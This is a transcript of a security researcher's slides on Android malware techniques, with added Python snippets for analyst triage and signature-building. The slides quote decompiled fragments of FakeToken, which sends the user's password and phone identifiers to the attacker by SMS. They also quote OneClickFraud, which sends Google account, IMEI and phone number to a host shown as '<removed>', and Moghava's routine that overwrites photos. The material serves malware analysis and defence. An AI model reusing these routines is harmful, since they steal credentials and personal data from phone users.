Isn't it all just SMS-sending trojans?: Real Advances in Android Malware by Jimmy Shah
Presentation Transcript

• Isn't it all just SMS-sending trojans?: Real advances in Android Malware
  Jimmy Shah, Mobile Security Researcher, McAfee
  Confidential—Internal Use Only

• Let's look at the numbers

• Not just malware ... Malware vs PUP
  [Chart: Malware vs PUP, two bars at 50.7% and 49.3%]

• Almost everything but SMS-sending trojans
  [Chart: By Category]
  Category               Share
  Downloader/Installer   10.1%
  HackTool                4.3%
  Backdoor/Botnet        27.5%
  Rooting malware         2.9%
  Exploit                23.2%
  Fraud                   2.9%
  Sends Premium SMS      18.8%
  Adware                  8.7%
  Spyware                21.7%
  Send Handset Info      42.0%

• Attacker Tricks

• Attacker Tricks - Encryption
  • Simple
    – Obfuscations
      • Hiding SMS numbers/message text within plaintext HTML files:
        <link rel="stylesheet" type="text/css" href="/en/shared/core/2/css/css.ashx?sc=/en/us/site.config&amp;pt=cspMscomHomePage&amp;c=cspMscomSiteBrand;cspSearchComponent;cspMscomFeaturePanel;cspMscomMasterNavigation;[<SMS#>:<MSG>]cspMscomNewsBand;cspVerticalRolloverTab;cspAdControl;cspMscomVerticalTab;cspSilverGate" />
        <script type="text/javascript" src="http//i3.microsoft.com/library/svy/broker.js"></script>
        <meta name="SearchTitle" content="Microsoft.com" scheme="" />
        <meta name="Description" content="Getproduct information, support, and news from Microsoft." scheme="" />
        <meta name="Title" content="Microsoft.c
    – Substitution cipher
      • Config file containing encrypted SMS numbers/message text:
        <SMS#>::<MSG>::241.55руб.
        <SMS#>::<MSG>::173.88руб.
        <SMS#>::<MSG>::86.00руб.
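As an added example (not from the slides) of how an analyst can triage an APK's assets for the two hiding places described above, the Python below scans text for `[number:message]` pairs tucked into HTML and parses the `::`-delimited config lines, undoing the substitution cipher with a hypothetical table; the sample HTML, config lines, numbers and table are all constructed placeholders, not values from a real sample.

```python
import re

# Constructed sample asset (not from a real sample): a number/message pair
# hidden inside a benign-looking HTML attribute in the "[<number>:<message>]"
# form shown on the slide.
HTML_ASSET = (
    '<link rel="stylesheet" href="/css/css.ashx?c=cspMscomSiteBrand;'
    'cspMscomMasterNavigation;[0000:SUB 1]cspMscomNewsBand" />\n'
    '<meta name="Title" content="Microsoft.com" />'
)

# Constructed config lines in the "<number>::<message>::<price>руб." form.
# Number and message are "encrypted" with a substitution cipher; the table
# below is a hypothetical one chosen for this example only.
CONFIG_ASSET = "9999::ZYQ 8::241.55руб.\n9998::ZYQ 7::173.88руб.\n"
SUBST_TABLE = str.maketrans("0123456789ZYQ", "9876543210SUB")

HIDDEN_PAIR_RE = re.compile(r"\[(\d{3,6}):([^\]\[]{1,40})\]")
CONFIG_LINE_RE = re.compile(r"^([^:\n]+)::([^:\n]+)::(\d+\.\d{2})руб\.$", re.M)


def find_hidden_sms_pairs(text):
    """Return (number, message) pairs embedded in otherwise benign text."""
    return HIDDEN_PAIR_RE.findall(text)


def decode_config(text, table):
    """Parse '::'-delimited config lines and undo the substitution cipher.

    Returns a list of (number, message, price_rub) tuples, one per line."""
    out = []
    for number, message, price in CONFIG_LINE_RE.findall(text):
        out.append((number.translate(table), message.translate(table), float(price)))
    return out


if __name__ == "__main__":
    print(find_hidden_sms_pairs(HTML_ASSET))
    print(decode_config(CONFIG_ASSET, SUBST_TABLE))
```

The recovered number/message pairs are what a detection signature or a carrier-side block list would key on, rather than the surrounding HTML, which changes freely between variants.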
• Attacker Tricks - Encryption
  • Complex
    – Symmetric cipher
      • DES:
        byte abyte1[] = k.b;
        DESKeySpec deskeyspec = new DESKeySpec(abyte1);
        javax.crypto.SecretKey secretkey = SecretKeyFactory.getInstance("DES").generateSecret(deskeyspec);
        Cipher cipher = Cipher.getInstance("DES");
        b = cipher;
        cipher.init(2, secretkey);   // 2 == Cipher.DECRYPT_MODE
    – Encrypt URL queries and C&C commands
    – Encrypt/decrypt config file
      • URLs, next connect time
    – Encrypt/decrypt C&C commands
    – Decrypt root exploits

• Attacker Tricks – Fraud
  • Pretending to be a legitimate app
    – Not the same as injecting malicious code
    – New or reused code that simulates the real app
      • Includes malicious functions
      • Almost just malicious code
  Class listing, Android/OneClickFraud:
    ./com/example/android/service/KitchenTimerService$KitchenTimerBinder.class
    ./com/example/android/service/R$id.class
    ./com/example/android/service/R$raw.class
    ./com/example/android/service/Main$KitchenTimerReceiver.class
    ./com/example/android/service/KitchenTimerService$2.class
    ./com/example/android/service/R$attr.class
    ./com/example/android/service/R$layout.class
    ./com/example/android/service/R.class
    ./com/example/android/service/Main.class
    ./com/example/android/service/R$drawable.class
    ./com/example/android/service/KitchenTimerService$1.class
    ./com/example/android/service/KitchenTimerService.class
    ./com/example/android/service/Main$1.class
    ./com/example/android/service/R$string.class
  Class listing, Android/FakeToken:
    ./token/bot/StartSettings.class
    ./token/bot/WebApi.class
    ./token/bot/CatchResult.class
    ./token/bot/SendSmsResult.class
    ./token/bot/SettingsSet.class
    ./token/bot/ScreenItem.class
    ./token/bot/AutorunReceiver.class
    ./token/bot/ServerResponse.class
    ./token/bot/MainActivity.class
    ./token/bot/ThreadOperation.class
    ./token/bot/AlarmReceiver.class
    ./token/bot/ThreadOperationListener.class
    ./token/bot/SmsReciver.class
    ./token/bot/MainApplication.class
    ./token/bot/MainService.class
    ./token/bot/SmsItem.class
    ./token/bot/HttpParam.class
    ./token/bot/Settings.class
    ./token/bot/UpdateActivity.class
    ./token/bot/MainActivity$1.class

• Attacker Tricks – Fraud
  • Android/FakeToken
    – Fake security token app
      • Customized for different banks
    – App asks for the user's password and displays a fake soft token:
      public void sendPass(String paramString) {
        try {
          if (!Settings.saved.sendInitSms) {
            Settings.saved.sendInitSms = true;
            String str = Settings.saved.smsPrefix + " INIT " + MainApplication.imei + " " + MainApplication.imsi + " " + paramString;
            MainService.sendSms(Settings.saved.number, str);
            MainApplication.settings.save(this.context);
          }
          new Thread(new ThreadOperation(this, 1, paramString)).start();
          label109: return;
        } catch (Exception localException) {
          break label109;
        }
      }

• Attacker Tricks – Fraud
  • Android/OneClickFraud
    – Fake adult entertainment app
      • App asks the user to pay for a subscription to the adult site
    – Repeats every 5 minutes:
      public void onReceive(Context paramContext, Intent paramIntent) {
        kitchenTimerService.schedule(300000L);   // 300000 ms = 5 minutes
        setContentView(2130903040);
        Account[] arrayOfAccount;

• Attacker Tricks – Fraud
  • Android/OneClickFraud
    – Sends user information including the Google account to the attacker:
      if (ctf.intValue() == 0) {
        Main localMain = Main.this;
        Integer localInteger = Integer.valueOf(1);
        localMain.ctf = localInteger;
        TelephonyManager localTelephonyManager = (TelephonyManager)getSystemService("phone");
        arrayOfAccount = AccountManager.get(Main.this).getAccounts();
        str1 = "";
        int i = arrayOfAccount.length;
        j = 0;
        if (j >= i) {
          String str2 = doPost("http://<removed>", "");
          StringBuilder localStringBuilder1 = new StringBuilder("http://<removed>");
          String str3 = localTelephonyManager.getDeviceId();
          StringBuilder localStringBuilder2 = localStringBuilder1.append(str3).append("&telno=");
          String str4 = localTelephonyManager.getLine1Number();
          Uri localUri1 = Uri.parse(str4 + "&m_addr=" + str1 + "&usr_id=" + str2);
          Intent localIntent1 = new Intent("android.intent.action.VIEW", localUri1);
          startActivity(localIntent1);
          boolean bool = moveTaskToBack(1);
        }
      }

• Attacker Tricks - Injecting code
  • Android/Moghava.A (Android/Stamper.A)
    – Malicious code injected into a legitimate app
      • Recipes for Iranian meals
  12 4/19/12

• Attacker Tricks - Injecting code
  • Android/Moghava.A
    – Real virus
      • Overwriting file infector
        – Not executable files, just image files
          » Specifically all of your JPGs
          » Designed to "photo bomb" all your photos with the Ayatollah Khomeini
      • Code injection:
        ./com/Moghava/kicker.smali
        ./com/Moghava/stamper$1.smali
        ./com/Moghava/stamper$1$1.smali
        ./com/Moghava/stamper.smali
        ./ir/sharif/iranianfoods/R$attr.smali
        ./ir/sharif/iranianfoods/R$styleable.smali
        ./ir/sharif/iranianfoods/R$menu.smali
        ./ir/sharif/iranianfoods/ListItemAdapter.smali
        ./ir/sharif/iranianfoods/IranData.smali
        ./ir/sharif/iranianfoods/Touch$AddImgAdp.smali
        ./ir/sharif/iranianfoods/TabHostActivity.smali
        ./ir/sharif/iranianfoods/Constants.smali
    – Buggy
      • Doesn't check if it has infected a file before

• Attacker Tricks - Injecting code
      localBitmap1 = BitmapFactory.decodeResource(this$0.getResources(), 2130837505);   // stamp image bundled as an app resource
      localBitmap2 = BitmapFactory.decodeFile(localFile2.getPath());                     // the victim's JPG from storage
      int m = localBitmap2.getWidth();
      int n = localBitmap1.getWidth();
      int i1 = m;
      int i2 = n;
      if (i1 > i2) {
        i3 = localBitmap2.getWidth();
        i4 = localBitmap2.getHeight();
        label122:
        Bitmap.Config localConfig = Bitmap.Config.ARGB_8888;
        localBitmap3 = Bitmap.createBitmap(i3, i4, localConfig);
        Canvas localCanvas = new Canvas(localBitmap3);
        float f1 = 0.0F;
        float f2 = 0.0F;
        Paint localPaint1 = null;
        localCanvas.drawBitmap(localBitmap2, f1, f2, localPaint1);   // draw the original photo
        float f3 = 100.0F;
        float f4 = 300.0F;
        Paint localPaint2 = null;
        localCanvas.drawBitmap(localBitmap1, f3, f4, localPaint2);   // draw the stamp on top at (100, 300)
      }

• Attacker Tricks - Injecting code
  Image credit: Mark Peters (Flickr ID - sneakerdog)

• Attacker Tricks – Recording Audio
  • Audio
    – DTMF ("Touch Tones")
    – Telephone calls
  • Initially used in academic PoCs
    – SoundComber
      • DB of IVR-converted DTMF
      • January 2011
  • Very common in spyware
  • Used in malware

• Attacker Tricks – Recording Audio
  • Android/Nickispy
    – Records to AMR files
    – August 2011
  • Android/GoldenEagle
    – Records to AMR files
    – September 2011
  • Audio recording benefits
    – Trade secrets
    – CC#
    – PINs

• Attacker Tricks - Malware Updates
  • Malware authors are now including update functionality
    – Keeping the profits rolling in and maintaining control of devices
    – Initially just used by mobile botnet clients
  • Generally only requires the permission INSTALL_PACKAGES
    • android.permission.INSTALL_PACKAGES
  • There are two main ways users are attacked
    – Fake legitimate updates
      • Ex: SYSTEM_PATCH, Android_4.0_patch
      • Really just trojan horses
    – Malware updating itself
      • More functions
        – Send sensitive user info
        – Exfiltrate data
      • New/patched payloads
        – Exploits

• Attacker Tricks - Malware Updates
  • Real malware updates
    – Because even the bad guys understand that sometimes you need to patch
  • Usually not visual
    – Don't inform the users/victims
    – Don't depend on users to approve updates

• Academic Research - Taplogger
  • Taplogger
    – Combination training and attack app
      • Reads the accelerometer for keypresses
      • Training app is a fake icon-matching game
        – High score = trained it to steal your PIN
      • Two attacks
        – Number pad logging
          » PINs, CC#s, etc.
        – Password stealing
          » Screen unlock
    – Previous research
      • Touchlogger
        – Two parts – training and logging
      • ACCessory
        – Detects full keyboard

• Academic Research - Taplogger
  [Slide image]

• Attacker Tricks - Rooting Exploits
  • Rooting Android
    – Good for improving security, but can leave you open to attack
    – Replacing firmware
    – Removing bloatware and security vulnerabilities
  • Most attackers are not interested in developing their own exploits
    – Function of slow patching on Android and the number of parties involved in releasing new firmware
      • "too many chefs in the kitchen"
    – Leads to the same three or four common exploits and minor modifications
  Exploit               Detected as
  PSneuter              Exploit/RetuenSP.A
  Gingerbreak           Exploit/Voldbrk, 18 minor variants of the same exploit
  Exploid               Exploit/Lvedu, 26 minor variants
  RageAgainstTheCage    Exploit/Diutes, 5 minor variants

• Attacker Tricks – Server-Side Polymorphism
  • Server-side
    – Uses larger resources server side vs. lower-powered devices
    – Modifying DEX files
      • Manual changes
        – Renaming source and recompiling
      • Automated changes
        – Easier than it sounds
        – Scriptable text changes in source

• Attacker Tricks – Server-Side Polymorphism
  • One major family: Android/FakeInstaller
    • Main generic signature
    • Supplementary detections for 25 variants
    • Changes
      – By day
      – By hour
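As an added illustration (not from the slides and not McAfee's signature logic) of why a "main generic signature" survives the renaming described in the two polymorphism slides, the Python below fingerprints two constructed smali fragments: variant B is variant A with the author's own classes and methods renamed, so the file hashes differ while a hash over the Android framework calls the code makes stays the same. The smali, class names and fingerprint scheme are all assumptions made for this example.

```python
import hashlib
import re

# Constructed smali for "variant A" of a hypothetical family (not a real sample).
VARIANT_A = """\
.class public Lcom/installer/Main;
.method private sendCode()V
    invoke-static {}, Landroid/telephony/SmsManager;->getDefault()Landroid/telephony/SmsManager;
    invoke-virtual {v0, v1, v2, v3, v4, v5}, Landroid/telephony/SmsManager;->sendTextMessage(Ljava/lang/String;Ljava/lang/String;Ljava/lang/String;Landroid/app/PendingIntent;Landroid/app/PendingIntent;)V
    invoke-direct {p0}, Lcom/installer/Main;->log()V
.end method
"""
# "Variant B": the scriptable rename-and-recompile step from the slide,
# touching only identifiers the attacker controls.
VARIANT_B = (VARIANT_A.replace("com/installer/Main", "a/b/c")
                      .replace("sendCode", "x")
                      .replace("log", "y"))

# Matches an invoke-* instruction and captures the target class and method.
INVOKE_RE = re.compile(r"^\s*invoke-\w+(?:/range)? \{[^}]*\}, (L[^;]+;)->([^(]+)\(", re.M)


def framework_calls(smali):
    """Set of 'Class->method' targets in the Android/Java framework.

    Calls into the app's own classes are dropped: those names are exactly
    what server-side polymorphism rewrites between variants."""
    calls = set()
    for cls, method in INVOKE_RE.findall(smali):
        if cls.startswith(("Landroid/", "Ljava/", "Ljavax/")):
            calls.add(cls + "->" + method)
    return calls


def generic_fingerprint(smali):
    """Hash over the sorted framework-call set: stable across renamed variants."""
    joined = "\n".join(sorted(framework_calls(smali)))
    return hashlib.sha256(joined.encode()).hexdigest()


def file_hash(data):
    """Plain content hash, which a per-variant (hourly) rebuild defeats."""
    return hashlib.sha256(data.encode()).hexdigest()
```

A production signature would add more renaming-invariant features (requested permissions, string constants such as the SMS short codes), but the principle is the same: key on what the attacker must keep, not on what a script can change.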
• Acknowledgements

• Acknowledgements
  • Zhi Xu, Kun Bai, and Sencun Zhu for the background on their Taplogger research.